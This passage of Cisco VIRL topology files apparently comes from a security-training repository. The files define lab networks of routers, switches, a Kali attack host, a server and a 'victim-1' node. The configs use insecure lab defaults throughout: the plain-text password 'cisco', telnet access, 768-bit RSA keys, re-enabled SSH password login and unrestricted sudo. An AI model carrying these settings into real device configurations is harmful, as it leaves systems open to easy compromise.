2001:db8:b:0:1::4 update-source Loopback0 ! neighbor 2001:db8:b:0:1::5 remote-as 1 neighbor 2001:db8:b:0:1::5 description iBGP peer iosv-4 neighbor 2001:db8:b:0:1::5 update-source Loopback0 ! ! ! address-family ipv4 network 192.168.0.4 mask 255.255.255.255 neighbor 192.168.0.3 activate neighbor 192.168.0.5 activate neighbor 192.168.0.6 activate exit-address-family ! address-family ipv6 network 2001:db8:b:0:1::3/128 neighbor 2001:db8:b:0:1::2 activate neighbor 2001:db8:b:0:1::4 activate neighbor 2001:db8:b:0:1::5 activate exit-address-family ! ! ! end</entry> <entry key="AutoNetkit.mgmt_ip" type="string"></entry> </extensions> <interface id="0" name="GigabitEthernet0/1" ipv4="10.0.0.14" ipv6="2001:db8:a:0:1:1:0:f" netPrefixLenV4="30" netPrefixLenV6="126"/> <interface id="1" name="GigabitEthernet0/2" ipv4="10.0.0.21" ipv6="2001:db8:a:0:1:1:0:16" netPrefixLenV4="30" netPrefixLenV6="126"/> </node> <node name="iosv-3" type="SIMPLE" subtype="IOSv" location="258,220" ipv4="192.168.0.5" ipv6="2001:db8:b:0:1::4"> <extensions> <entry key="config" type="string">! IOS Config generated on 2017-08-12 17:43 ! by autonetkit_0.23.5 ! hostname iosv-3 boot-start-marker boot-end-marker ! vrf definition Mgmt-intf ! address-family ipv4 exit-address-family ! address-family ipv6 exit-address-family ! ! ! no aaa new-model ! ! ip cef ipv6 unicast-routing ipv6 cef ! ! service timestamps debug datetime msec service timestamps log datetime msec no service password-encryption no service config enable password cisco ip classless ip subnet-zero no ip domain lookup ip domain name virl.info crypto key generate rsa modulus 768 ip ssh server algorithm authentication password username cisco privilege 15 secret cisco line vty 0 4 transport input ssh telnet exec-timeout 720 0 password cisco login local line con 0 password cisco ! cdp run ! ! interface Loopback0 description Loopback ip address 192.168.0.5 255.255.255.255 ipv6 address 2001:db8:b:0:1::4/128 ipv6 ospf cost 1 ipv6 ospf 1 area 0 ! interface GigabitEthernet0/0 description OOB Management vrf forwarding Mgmt-intf ! Configured on launch no ip address cdp enable duplex full speed auto no shutdown ! interface GigabitEthernet0/1 description to iosv-1 ip address 10.0.0.18 255.255.255.252 ipv6 address 2001:db8:a:0:1:1:0:13/126 cdp enable ip ospf cost 1 ipv6 ospf cost 1 ipv6 ospf 1 area 0 duplex full speed auto no shutdown ! interface GigabitEthernet0/2 description to iosv-4 ip address 10.0.0.25 255.255.255.252 ipv6 address 2001:db8:a:0:1:1:0:1a/126 cdp enable ip ospf cost 1 ipv6 ospf cost 1 ipv6 ospf 1 area 0 duplex full speed auto no shutdown ! ! ! router ospf 1 network 192.168.0.5 0.0.0.0 area 0 log-adjacency-changes passive-interface Loopback0 network 10.0.0.16 0.0.0.3 area 0 network 10.0.0.24 0.0.0.3 area 0 router ospfv3 1 router-id 192.168.0.5 ! address-family ipv6 unicast exit-address-family ! ! router bgp 1 bgp router-id 192.168.0.5 no synchronization ! ibgp ! ibgp peers ! neighbor 192.168.0.3 remote-as 1 neighbor 192.168.0.3 description iBGP peer iosv-1 neighbor 192.168.0.3 update-source Loopback0 ! neighbor 192.168.0.4 remote-as 1 neighbor 192.168.0.4 description iBGP peer iosv-2 neighbor 192.168.0.4 update-source Loopback0 ! neighbor 192.168.0.6 remote-as 1 neighbor 192.168.0.6 description iBGP peer iosv-4 neighbor 192.168.0.6 update-source Loopback0 ! neighbor 2001:db8:b:0:1::2 remote-as 1 neighbor 2001:db8:b:0:1::2 description iBGP peer iosv-1 neighbor 2001:db8:b:0:1::2 update-source Loopback0 ! neighbor 2001:db8:b:0:1::3 remote-as 1 neighbor 2001:db8:b:0:1::3 description iBGP peer iosv-2 neighbor 2001:db8:b:0:1::3 update-source Loopback0 ! neighbor 2001:db8:b:0:1::5 remote-as 1 neighbor 2001:db8:b:0:1::5 description iBGP peer iosv-4 neighbor 2001:db8:b:0:1::5 update-source Loopback0 ! ! ! address-family ipv4 network 192.168.0.5 mask 255.255.255.255 neighbor 192.168.0.3 activate neighbor 192.168.0.4 activate neighbor 192.168.0.6 activate exit-address-family ! address-family ipv6 network 2001:db8:b:0:1::4/128 neighbor 2001:db8:b:0:1::2 activate neighbor 2001:db8:b:0:1::3 activate neighbor 2001:db8:b:0:1::5 activate exit-address-family ! ! ! end</entry> <entry key="AutoNetkit.mgmt_ip" type="string"></entry> </extensions> <interface id="0" name="GigabitEthernet0/1" ipv4="10.0.0.18" ipv6="2001:db8:a:0:1:1:0:13" netPrefixLenV4="30" netPrefixLenV6="126"/> <interface id="1" name="GigabitEthernet0/2" ipv4="10.0.0.25" ipv6="2001:db8:a:0:1:1:0:1a" netPrefixLenV4="30" netPrefixLenV6="126"/> </node> <node name="iosv-4" type="SIMPLE" subtype="IOSv" location="332,123" ipv4="192.168.0.6" ipv6="2001:db8:b:0:1::5"> <extensions> <entry key="config" type="string">! IOS Config generated on 2017-08-12 17:43 ! by autonetkit_0.23.5 ! hostname iosv-4 boot-start-marker boot-end-marker ! vrf definition Mgmt-intf ! address-family ipv4 exit-address-family ! address-family ipv6 exit-address-family ! ! ! no aaa new-model ! ! ip cef ipv6 unicast-routing ipv6 cef ! ! service timestamps debug datetime msec service timestamps log datetime msec no service password-encryption no service config enable password cisco ip classless ip subnet-zero no ip domain lookup ip domain name virl.info crypto key generate rsa modulus 768 ip ssh server algorithm authentication password username cisco privilege 15 secret cisco line vty 0 4 transport input ssh telnet exec-timeout 720 0 password cisco login local line con 0 password cisco ! cdp run ! ! interface Loopback0 description Loopback ip address 192.168.0.6 255.255.255.255 ipv6 address 2001:db8:b:0:1::5/128 ipv6 ospf cost 1 ipv6 ospf 1 area 0 ! interface GigabitEthernet0/0 description OOB Management vrf forwarding Mgmt-intf ! Configured on launch no ip address cdp enable duplex full speed auto no shutdown ! interface GigabitEthernet0/1 description to iosvl2-2 ip address 10.0.0.9 255.255.255.252 ipv6 address 2001:db8:a:0:1:1:0:b/126 cdp enable ip ospf cost 1 ipv6 ospf cost 1 ipv6 ospf 1 area 0 duplex full speed auto no shutdown ! interface GigabitEthernet0/2 description to iosv-2 ip address 10.0.0.22 255.255.255.252 ipv6 address 2001:db8:a:0:1:1:0:17/126 cdp enable ip ospf cost 1 ipv6 ospf cost 1 ipv6 ospf 1 area 0 duplex full speed auto no shutdown ! interface GigabitEthernet0/3 description to iosv-3 ip address 10.0.0.26 255.255.255.252 ipv6 address 2001:db8:a:0:1:1:0:1b/126 cdp enable ip ospf cost 1 ipv6 ospf cost 1 ipv6 ospf 1 area 0 duplex full speed auto no shutdown ! ! ! router ospf 1 network 192.168.0.6 0.0.0.0 area 0 log-adjacency-changes passive-interface Loopback0 network 10.0.0.8 0.0.0.3 area 0 network 10.0.0.20 0.0.0.3 area 0 network 10.0.0.24 0.0.0.3 area 0 router ospfv3 1 router-id 192.168.0.6 ! address-family ipv6 unicast exit-address-family ! ! router bgp 1 bgp router-id 192.168.0.6 no synchronization ! ibgp ! ibgp peers ! neighbor 192.168.0.3 remote-as 1 neighbor 192.168.0.3 description iBGP peer iosv-1 neighbor 192.168.0.3 update-source Loopback0 ! neighbor 192.168.0.4 remote-as 1 neighbor 192.168.0.4 description iBGP peer iosv-2 neighbor 192.168.0.4 update-source Loopback0 ! neighbor 192.168.0.5 remote-as 1 neighbor 192.168.0.5 description iBGP peer iosv-3 neighbor 192.168.0.5 update-source Loopback0 ! neighbor 2001:db8:b:0:1::2 remote-as 1 neighbor 2001:db8:b:0:1::2 description iBGP peer iosv-1 neighbor 2001:db8:b:0:1::2 update-source Loopback0 ! neighbor 2001:db8:b:0:1::3 remote-as 1 neighbor 2001:db8:b:0:1::3 description iBGP peer iosv-2 neighbor 2001:db8:b:0:1::3 update-source Loopback0 ! neighbor 2001:db8:b:0:1::4 remote-as 1 neighbor 2001:db8:b:0:1::4 description iBGP peer iosv-3 neighbor 2001:db8:b:0:1::4 update-source Loopback0 ! ! ! address-family ipv4 network 192.168.0.6 mask 255.255.255.255 neighbor 192.168.0.3 activate neighbor 192.168.0.4 activate neighbor 192.168.0.5 activate exit-address-family ! address-family ipv6 network 2001:db8:b:0:1::5/128 neighbor 2001:db8:b:0:1::2 activate neighbor 2001:db8:b:0:1::3 activate neighbor 2001:db8:b:0:1::4 activate exit-address-family ! ! ! end</entry> <entry key="AutoNetkit.mgmt_ip" type="string"></entry> </extensions> <interface id="0" name="GigabitEthernet0/1" ipv4="10.0.0.9" ipv6="2001:db8:a:0:1:1:0:b" netPrefixLenV4="30" netPrefixLenV6="126"/> <interface id="1" name="GigabitEthernet0/2" ipv4="10.0.0.22" ipv6="2001:db8:a:0:1:1:0:17" netPrefixLenV4="30" netPrefixLenV6="126"/> <interface id="2" name="GigabitEthernet0/3" ipv4="10.0.0.26" ipv6="2001:db8:a:0:1:1:0:1b" netPrefixLenV4="30" netPrefixLenV6="126"/> </node> <annotations/> <connection dst="/virl:topology/virl:node[3]/virl:interface[1]" src="/virl:topology/virl:node[1]/virl:interface[1]"/> <connection dst="/virl:topology/virl:node[4]/virl:interface[1]" src="/virl:topology/virl:node[2]/virl:interface[1]"/> <connection dst="/virl:topology/virl:node[5]/virl:interface[1]" src="/virl:topology/virl:node[3]/virl:interface[2]"/> <connection dst="/virl:topology/virl:node[8]/virl:interface[1]" src="/virl:topology/virl:node[4]/virl:interface[2]"/> <connection dst="/virl:topology/virl:node[6]/virl:interface[1]" src="/virl:topology/virl:node[5]/virl:interface[2]"/> <connection dst="/virl:topology/virl:node[6]/virl:interface[2]" src="/virl:topology/virl:node[8]/virl:interface[2]"/> <connection dst="/virl:topology/virl:node[7]/virl:interface[1]" src="/virl:topology/virl:node[5]/virl:interface[3]"/> <connection dst="/virl:topology/virl:node[7]/virl:interface[2]" src="/virl:topology/virl:node[8]/virl:interface[3]"/> </topology>
h4cker/virl_topologies/8.6.virl
<?xml version="1.0" encoding="UTF-8" standalone="yes"?> <topology xmlns="http://www.cisco.com/VIRL" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" schemaVersion="0.95" xsi:schemaLocation="http://www.cisco.com/VIRL https://raw.github.com/CiscoVIRL/schema/v0.95/virl.xsd"> <extensions> <entry key="AutoNetkit.infrastructure_only" type="Boolean">false</entry> <entry key="management_network" type="String">flat</entry> <entry key="management_lxc" type="Boolean">true</entry> </extensions> <node name="iosvl2-1" type="SIMPLE" subtype="IOSvL2" location="296,180"> <extensions> <entry key="config" type="string">! IOSvL2 Config generated on 2017-08-13 13:49 ! by autonetkit_0.23.5 ! version 15.2 service timestamps debug datetime msec service timestamps log datetime msec no service password-encryption service compress-config no service config enable password cisco ip classless ip subnet-zero no ip domain lookup ! line vty 0 4 transport input ssh telnet exec-timeout 720 0 password cisco login ! line con 0 password cisco ! hostname iosvl2-1 ! boot-start-marker boot-end-marker ! ! ! no aaa new-model ! vtp domain virl.lab vtp mode transparent ! vlan 2 name ank_vlan2 vlan 3 name ank_vlan3 ! ! ! ! no cdp run ! ! ! ip cef no ipv6 cef ! ! spanning-tree mode pvst spanning-tree extend system-id ! vlan internal allocation policy ascending ! ! ! ! vrf definition Mgmt-intf ! address-family ipv4 exit-address-family ! address-family ipv6 exit-address-family ! ! ! ! ! interface Loopback0 description Loopback ! interface GigabitEthernet0/0 description OOB management ! Configured on launch no switchport vrf forwarding Mgmt-intf no ip address no shutdown ! interface GigabitEthernet0/1 description to iosvl2-2 switchport trunk encapsulation dot1q switchport mode trunk no shutdown ! interface GigabitEthernet0/2 description to iosv-1 switchport access vlan 2 switchport mode access no shutdown ! interface GigabitEthernet0/3 description to kali-1 switchport access vlan 2 switchport mode access no shutdown ! interface GigabitEthernet1/0 description to victim-1 switchport access vlan 2 switchport mode access no shutdown ! ! ip forward-protocol nd ! no ip http server no ip http secure-server ! ! ! ! ! ! control-plane ! ! ! end </entry> <entry key="AutoNetkit.mgmt_ip" type="string"></entry> </extensions> <interface id="0" name="GigabitEthernet0/1"/> <interface id="1" name="GigabitEthernet0/2"/> <interface id="2" name="GigabitEthernet0/3"/> <interface id="3" name="GigabitEthernet1/0"/> </node> <node name="iosvl2-2" type="SIMPLE" subtype="IOSvL2" location="520,177"> <extensions> <entry key="config" type="string">! IOSvL2 Config generated on 2017-08-13 13:49 ! by autonetkit_0.23.5 ! version 15.2 service timestamps debug datetime msec service timestamps log datetime msec no service password-encryption service compress-config no service config enable password cisco ip classless ip subnet-zero no ip domain lookup ! line vty 0 4 transport input ssh telnet exec-timeout 720 0 password cisco login ! line con 0 password cisco ! hostname iosvl2-2 ! boot-start-marker boot-end-marker ! ! ! no aaa new-model ! vtp domain virl.lab vtp mode transparent ! vlan 2 name ank_vlan2 vlan 3 name ank_vlan3 ! ! ! ! no cdp run ! ! ! ip cef no ipv6 cef ! ! spanning-tree mode pvst spanning-tree extend system-id ! vlan internal allocation policy ascending ! ! ! ! vrf definition Mgmt-intf ! address-family ipv4 exit-address-family ! address-family ipv6 exit-address-family ! ! ! ! ! interface Loopback0 description Loopback ! interface GigabitEthernet0/0 description OOB management ! Configured on launch no switchport vrf forwarding Mgmt-intf no ip address no shutdown ! interface GigabitEthernet0/1 description to iosvl2-1 switchport trunk encapsulation dot1q switchport mode trunk no shutdown ! interface GigabitEthernet0/2 description to iosv-1 switchport access vlan 3 switchport mode access no shutdown ! interface GigabitEthernet0/3 description to server-1 switchport access vlan 3 switchport mode access no shutdown ! ! ip forward-protocol nd ! no ip http server no ip http secure-server ! ! ! ! ! ! control-plane ! ! ! end </entry> <entry key="AutoNetkit.mgmt_ip" type="string"></entry> </extensions> <interface id="0" name="GigabitEthernet0/1"/> <interface id="1" name="GigabitEthernet0/2"/> <interface id="2" name="GigabitEthernet0/3"/> </node> <node name="kali-1" type="SIMPLE" subtype="kali" location="193,282"> <extensions> <entry key="config" type="string">#cloud-config bootcmd: - ln -s -t /etc/rc.d /etc/rc.local hostname: kali-1 manage_etc_hosts: true runcmd: - start ttyS0 - systemctl start [email protected] - systemctl start rc-local - sed -i '/^\s*PasswordAuthentication\s\+no/d' /etc/ssh/sshd_config - echo "UseDNS no" &gt;&gt; /etc/ssh/sshd_config - service ssh restart - service sshd restart users: - default - gecos: User configured by VIRL Configuration Engine 0.23.10 lock-passwd: false name: cisco plain-text-passwd: cisco shell: /bin/bash ssh-authorized-keys: - VIRL-USER-SSH-PUBLIC-KEY sudo: ALL=(ALL) ALL write_files: - path: /etc/init/ttyS0.conf owner: root:root content: | # ttyS0 - getty # This service maintains a getty on ttyS0 from the point the system is # started until it is shut down again. start on stopped rc or RUNLEVEL=[12345] stop on runlevel [!12345] respawn exec /sbin/getty -L 115200 ttyS0 vt102 permissions: '0644' - path: /etc/systemd/system/[email protected] content: | [Unit] Description=Run dhclient on %i interface After=network.target [Service] Type=oneshot ExecStart=/sbin/dhclient %i -pf /var/run/dhclient.%i.pid -lf /var/lib/dhclient/dhclient.%i.lease RemainAfterExit=yes owner: root:root permissions: '0644' - path: /etc/rc.local owner: root:root permissions: '0755' content: |- #!/bin/sh ifconfig eth1 up 10.0.0.2 netmask 255.255.128.0 route add -host 192.168.0.2 gw 10.0.0.3 dev eth1 route add -net 10.0.0.0/17 gw 10.0.0.3 dev eth1 route add -net 10.0.128.0/30 gw 10.0.0.3 dev eth1 exit 0 </entry> </extensions> <interface id="0" name="eth1" ipv4="10.0.0.2" netPrefixLenV4="17"> <extensions> <entry key="AutoNetkit.vlan" type="Integer">2</entry> </extensions> </interface> </node> <node name="iosv-1" type="SIMPLE" subtype="IOSv" location="417,76" ipv4="192.168.0.2"> <extensions> <entry key="config" type="string">! IOS Config generated on 2017-08-13 13:49 ! by autonetkit_0.23.5 ! hostname iosv-1 boot-start-marker boot-end-marker ! vrf definition Mgmt-intf ! address-family ipv4 exit-address-family ! address-family ipv6 exit-address-family ! ! ! no aaa new-model ! ! ip cef ipv6 unicast-routing ipv6 cef ! ! service timestamps debug datetime msec service timestamps log datetime msec no service password-encryption no service config enable password cisco ip classless ip subnet-zero no ip domain lookup ip domain name virl.info crypto key generate rsa modulus 768 ip ssh server algorithm authentication password username cisco privilege 15 secret cisco line vty 0 4 transport input ssh telnet exec-timeout 720 0 password cisco login local line con 0 password cisco ! no cdp run ! ! interface Loopback0 description Loopback ip address 192.168.0.2 255.255.255.255 ! interface GigabitEthernet0/0 description OOB Management vrf forwarding Mgmt-intf ! Configured on launch no ip address duplex full speed auto no shutdown ! interface GigabitEthernet0/1 description to iosvl2-1 ip address 10.0.0.3 255.255.128.0 ip ospf cost 1 duplex full speed auto no shutdown ! interface GigabitEthernet0/2 description to iosvl2-2 ip address 10.0.128.1 255.255.255.252 ip ospf cost 1 duplex full speed auto no shutdown ! ! ! router ospf 1 network 192.168.0.2 0.0.0.0 area 0 log-adjacency-changes passive-interface Loopback0 network 10.0.0.0 0.0.127.255 area 0 network 10.0.128.0 0.0.0.3 area 0 ! ! end</entry> <entry key="AutoNetkit.mgmt_ip" type="string"></entry> </extensions> <interface id="0" name="GigabitEthernet0/1" ipv4="10.0.0.3" netPrefixLenV4="17"> <extensions> <entry key="AutoNetkit.vlan" type="Integer">2</entry> </extensions> </interface> <interface id="1" name="GigabitEthernet0/2" ipv4="10.0.128.1" netPrefixLenV4="30"> <extensions> <entry key="AutoNetkit.vlan" type="Integer">3</entry> </extensions> </interface> </node> <node name="server-1" type="SIMPLE" subtype="server" location="592,287"> <extensions> <entry key="config" type="string">#cloud-config bootcmd: - ln -s -t /etc/rc.d /etc/rc.local hostname: server-1 manage_etc_hosts: true runcmd: - start ttyS0 - systemctl start [email protected] - systemctl start rc-local - sed -i '/^\s*PasswordAuthentication\s\+no/d' /etc/ssh/sshd_config - echo "UseDNS no" &gt;&gt; /etc/ssh/sshd_config - service ssh restart - service sshd restart users: - default - gecos: User configured by VIRL Configuration Engine 0.23.10 lock-passwd: false name: cisco plain-text-passwd: cisco shell: /bin/bash ssh-authorized-keys: - VIRL-USER-SSH-PUBLIC-KEY sudo: ALL=(ALL) ALL write_files: - path: /etc/init/ttyS0.conf owner: root:root content: | # ttyS0 - getty # This service maintains a getty on ttyS0 from the point the system is # started until it is shut down again. start on stopped rc or RUNLEVEL=[12345] stop on runlevel [!12345] respawn exec /sbin/getty -L 115200 ttyS0 vt102 permissions: '0644' - path: /etc/systemd/system/[email protected] content: | [Unit] Description=Run dhclient on %i interface After=network.target [Service] Type=oneshot ExecStart=/sbin/dhclient %i -pf /var/run/dhclient.%i.pid -lf /var/lib/dhclient/dhclient.%i.lease RemainAfterExit=yes owner: root:root permissions: '0644' - path: /etc/rc.local owner: root:root permissions: '0755' content: |- #!/bin/sh ifconfig eth1 up 10.0.128.2 netmask 255.255.255.252 route add -host 192.168.0.2 gw 10.0.128.1 dev eth1 route add -net 10.0.0.0/17 gw 10.0.128.1 dev eth1 route add -net 10.0.128.0/30 gw 10.0.128.1 dev eth1 exit 0 </entry> </extensions> <interface id="0" name="eth1" ipv4="10.0.128.2" netPrefixLenV4="30"> <extensions> <entry key="AutoNetkit.vlan" type="Integer">3</entry> </extensions> </interface> </node> <node name="victim-1" type="SIMPLE" subtype="lxc" location="354,280"> <extensions> <entry key="config" type="string">#cloud-config bootcmd: - ln -s -t /etc/rc.d /etc/rc.local hostname: victim-1 manage_etc_hosts: true runcmd: - systemctl start rc-local - sed -i '/^\s*PasswordAuthentication\s\+no/d' /etc/ssh/sshd_config - echo "UseDNS no" &gt;&gt; /etc/ssh/sshd_config - service ssh restart - service sshd restart users: - default - gecos: User configured by VIRL Configuration Engine 0.23.10 lock-passwd: false name: cisco plain-text-passwd: cisco shell: /bin/bash ssh-authorized-keys: - VIRL-USER-SSH-PUBLIC-KEY sudo: ALL=(ALL) ALL write_files: - path: /etc/systemd/system/[email protected] content: | [Unit] Description=Run dhclient on %i interface After=network.target [Service] Type=oneshot ExecStart=/sbin/dhclient %i -pf /var/run/dhclient.%i.pid -lf /var/lib/dhclient/dhclient.%i.lease RemainAfterExit=yes owner: root:root permissions: '0644' - path: /etc/rc.local owner: root:root permissions: '0755' content: |- #!/bin/sh ifconfig eth1 up 10.0.0.1 netmask 255.255.128.0 route add -host 192.168.0.2 gw 10.0.0.3 dev eth1 route add -net 10.0.0.0/17 gw 10.0.0.3 dev eth1 route add -net 10.0.128.0/30 gw 10.0.0.3 dev eth1 exit 0 </entry> </extensions> <interface id="0" name="eth1" ipv4="10.0.0.1" netPrefixLenV4="17"> <extensions> <entry key="AutoNetkit.vlan" type="Integer">2</entry> </extensions> </interface> </node> <annotations/> <connection dst="/virl:topology/virl:node[2]/virl:interface[1]" src="/virl:topology/virl:node[1]/virl:interface[1]"/> <connection dst="/virl:topology/virl:node[1]/virl:interface[2]" src="/virl:topology/virl:node[4]/virl:interface[1]"/> <connection dst="/virl:topology/virl:node[4]/virl:interface[2]" src="/virl:topology/virl:node[2]/virl:interface[2]"/> <connection dst="/virl:topology/virl:node[1]/virl:interface[3]" src="/virl:topology/virl:node[3]/virl:interface[1]"/> <connection dst="/virl:topology/virl:node[2]/virl:interface[3]" src="/virl:topology/virl:node[5]/virl:interface[1]"/> <connection dst="/virl:topology/virl:node[6]/virl:interface[1]" src="/virl:topology/virl:node[1]/virl:interface[4]"/> </topology>
h4cker/virl_topologies/8.7.virl
<?xml version="1.0" encoding="UTF-8" standalone="yes"?> <topology xmlns="http://www.cisco.com/VIRL" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" schemaVersion="0.95" xsi:schemaLocation="http://www.cisco.com/VIRL https://raw.github.com/CiscoVIRL/schema/v0.95/virl.xsd"> <extensions> <entry key="AutoNetkit.infrastructure_only" type="Boolean">false</entry> <entry key="management_network" type="String">flat</entry> </extensions> <node name="iosvl2-1" type="SIMPLE" subtype="IOSvL2" location="296,180"> <extensions> <entry key="config" type="string">! IOSvL2 Config generated on 2017-08-13 22:06 ! by autonetkit_0.23.5 ! version 15.2 service timestamps debug datetime msec service timestamps log datetime msec no service password-encryption service compress-config no service config enable password cisco ip classless ip subnet-zero no ip domain lookup ! line vty 0 4 transport input ssh telnet exec-timeout 720 0 password cisco login ! line con 0 password cisco ! hostname iosvl2-1 ! boot-start-marker boot-end-marker ! ! ! no aaa new-model ! vtp domain virl.lab vtp mode transparent ! vlan 2 name ank_vlan2 vlan 3 name ank_vlan3 ! ! ! ! no cdp run ! ! ! ip cef no ipv6 cef ! ! spanning-tree mode pvst spanning-tree extend system-id ! vlan internal allocation policy ascending ! ! ! ! vrf definition Mgmt-intf ! address-family ipv4 exit-address-family ! address-family ipv6 exit-address-family ! ! ! ! ! interface Loopback0 description Loopback ! interface GigabitEthernet0/0 description OOB management ! Configured on launch no switchport vrf forwarding Mgmt-intf no ip address no shutdown ! interface GigabitEthernet0/1 description to iosvl2-2 switchport trunk encapsulation dot1q switchport mode trunk no shutdown ! interface GigabitEthernet0/2 description to iosv-1 switchport access vlan 2 switchport mode access no shutdown ! interface GigabitEthernet0/3 description to kali-1 switchport access vlan 2 switchport mode access no shutdown ! interface GigabitEthernet1/0 description to iosv-2 switchport access vlan 2 switchport mode access no shutdown ! ! ip forward-protocol nd ! no ip http server no ip http secure-server ! ! ! ! ! ! control-plane ! ! ! end </entry> <entry key="AutoNetkit.mgmt_ip" type="string"></entry> </extensions> <interface id="0" name="GigabitEthernet0/1"/> <interface id="1" name="GigabitEthernet0/2"/> <interface id="2" name="GigabitEthernet0/3"/> <interface id="3" name="GigabitEthernet1/0"/> </node> <node name="iosvl2-2" type="SIMPLE" subtype="IOSvL2" location="520,177"> <extensions> <entry key="config" type="string">! IOSvL2 Config generated on 2017-08-13 22:06 ! by autonetkit_0.23.5 ! version 15.2 service timestamps debug datetime msec service timestamps log datetime msec no service password-encryption service compress-config no service config enable password cisco ip classless ip subnet-zero no ip domain lookup ! line vty 0 4 transport input ssh telnet exec-timeout 720 0 password cisco login ! line con 0 password cisco ! hostname iosvl2-2 ! boot-start-marker boot-end-marker ! ! ! no aaa new-model ! vtp domain virl.lab vtp mode transparent ! vlan 2 name ank_vlan2 vlan 3 name ank_vlan3 ! ! ! ! no cdp run ! ! ! ip cef no ipv6 cef ! ! spanning-tree mode pvst spanning-tree extend system-id ! vlan internal allocation policy ascending ! ! ! ! vrf definition Mgmt-intf ! address-family ipv4 exit-address-family ! address-family ipv6 exit-address-family ! ! ! ! ! interface Loopback0 description Loopback ! interface GigabitEthernet0/0 description OOB management ! Configured on launch no switchport vrf forwarding Mgmt-intf no ip address no shutdown ! interface GigabitEthernet0/1 description to iosvl2-1 switchport trunk encapsulation dot1q switchport mode trunk no shutdown ! interface GigabitEthernet0/2 description to iosv-1 switchport access vlan 3 switchport mode access no shutdown ! interface GigabitEthernet0/3 description to server-1 switchport access vlan 3 switchport mode access no shutdown ! ! ip forward-protocol nd ! no ip http server no ip http secure-server ! ! ! ! ! ! control-plane ! ! ! end </entry> <entry key="AutoNetkit.mgmt_ip" type="string"></entry> </extensions> <interface id="0" name="GigabitEthernet0/1"/> <interface id="1" name="GigabitEthernet0/2"/> <interface id="2" name="GigabitEthernet0/3"/> </node> <node name="kali-1" type="SIMPLE" subtype="kali" location="193,282"> <extensions> <entry key="config" type="string">#cloud-config bootcmd: - ln -s -t /etc/rc.d /etc/rc.local hostname: kali-1 manage_etc_hosts: true runcmd: - start ttyS0 - systemctl start [email protected] - systemctl start rc-local - sed -i '/^\s*PasswordAuthentication\s\+no/d' /etc/ssh/sshd_config - echo "UseDNS no" &gt;&gt; /etc/ssh/sshd_config - service ssh restart - service sshd restart users: - default - gecos: User configured by VIRL Configuration Engine 0.23.10 lock-passwd: false name: cisco plain-text-passwd: cisco shell: /bin/bash ssh-authorized-keys: - VIRL-USER-SSH-PUBLIC-KEY sudo: ALL=(ALL) ALL write_files: - path: /etc/init/ttyS0.conf owner: root:root content: | # ttyS0 - getty # This service maintains a getty on ttyS0 from the point the system is # started until it is shut down again. start on stopped rc or RUNLEVEL=[12345] stop on runlevel [!12345] respawn exec /sbin/getty -L 115200 ttyS0 vt102 permissions: '0644' - path: /etc/systemd/system/[email protected] content: | [Unit] Description=Run dhclient on %i interface After=network.target [Service] Type=oneshot ExecStart=/sbin/dhclient %i -pf /var/run/dhclient.%i.pid -lf /var/lib/dhclient/dhclient.%i.lease RemainAfterExit=yes owner: root:root permissions: '0644' - path: /etc/rc.local owner: root:root permissions: '0755' content: |- #!/bin/sh ifconfig eth1 up 10.0.0.1 netmask 255.255.128.0 route add -host 192.168.0.1 gw 10.0.0.2 dev eth1 route add -host 192.168.0.4 gw 10.0.0.2 dev eth1 route add -net 10.0.0.0/17 gw 10.0.0.2 dev eth1 route add -net 10.0.128.0/30 gw 10.0.0.2 dev eth1 route add -host 192.168.0.1 gw 10.0.0.3 dev eth1 route add -host 192.168.0.4 gw 10.0.0.3 dev eth1 route add -net 10.0.0.0/17 gw 10.0.0.3 dev eth1 route add -net 10.0.128.0/30 gw 10.0.0.3 dev eth1 exit 0 </entry> </extensions> <interface id="0" name="eth1" ipv4="10.0.0.1" netPrefixLenV4="17"> <extensions> <entry key="AutoNetkit.vlan" type="Integer">2</entry> </extensions> </interface> </node> <node name="iosv-1" type="SIMPLE" subtype="IOSv" location="417,76" ipv4="192.168.0.1"> <extensions> <entry key="config" type="string">! IOS Config generated on 2017-08-13 22:06 ! by autonetkit_0.23.5 ! hostname iosv-1 boot-start-marker boot-end-marker ! vrf definition Mgmt-intf ! address-family ipv4 exit-address-family ! address-family ipv6 exit-address-family ! ! ! no aaa new-model ! ! ip cef ipv6 unicast-routing ipv6 cef ! ! service timestamps debug datetime msec service timestamps log datetime msec no service password-encryption no service config enable password cisco ip classless ip subnet-zero no ip domain lookup ip domain name virl.info crypto key generate rsa modulus 768 ip ssh server algorithm authentication password username cisco privilege 15 secret cisco line vty 0 4 transport input ssh telnet exec-timeout 720 0 password cisco login local line con 0 password cisco ! no cdp run ! ! interface Loopback0 description Loopback ip address 192.168.0.1 255.255.255.255 ! interface GigabitEthernet0/0 description OOB Management vrf forwarding Mgmt-intf ! Configured on launch no ip address duplex full speed auto no shutdown ! interface GigabitEthernet0/1 description to iosvl2-1 ip address 10.0.0.2 255.255.128.0 ip ospf cost 1 duplex full speed auto no shutdown ! interface GigabitEthernet0/2 description to iosvl2-2 ip address 10.0.128.1 255.255.255.252 ip ospf cost 1 duplex full speed auto no shutdown ! interface GigabitEthernet0/3 description GigabitEthernet0/3 no ip address duplex full speed auto no shutdown ! ! ! router ospf 1 network 192.168.0.1 0.0.0.0 area 0 log-adjacency-changes passive-interface Loopback0 network 10.0.0.0 0.0.127.255 area 0 network 10.0.128.0 0.0.0.3 area 0 ! ! router bgp 1 bgp router-id 192.168.0.1 no synchronization ! ibgp ! ibgp peers ! neighbor 192.168.0.4 remote-as 1 neighbor 192.168.0.4 description iBGP peer iosv-2 neighbor 192.168.0.4 update-source Loopback0 ! ! ! address-family ipv4 network 192.168.0.1 mask 255.255.255.255 neighbor 192.168.0.4 activate exit-address-family ! ! ! end</entry> <entry key="AutoNetkit.mgmt_ip" type="string"></entry> </extensions> <interface id="0" name="GigabitEthernet0/1" ipv4="10.0.0.2" netPrefixLenV4="17"> <extensions> <entry key="AutoNetkit.vlan" type="Integer">2</entry> </extensions> </interface> <interface id="1" name="GigabitEthernet0/2" ipv4="10.0.128.1" netPrefixLenV4="30"> <extensions> <entry key="AutoNetkit.vlan" type="Integer">3</entry> </extensions> </interface> <interface id="2" name="GigabitEthernet0/3"/> </node> <node name="server-1" type="SIMPLE" subtype="server" location="592,287"> <extensions> <entry key="config" type="String">#cloud-config bootcmd: - ln -s -t /etc/rc.d /etc/rc.local hostname: server-1 manage_etc_hosts: true package_update: true packages: - snmp runcmd: - start ttyS0 - systemctl start [email protected] - systemctl start rc-local - sed -i '/^\s*PasswordAuthentication\s\+no/d' 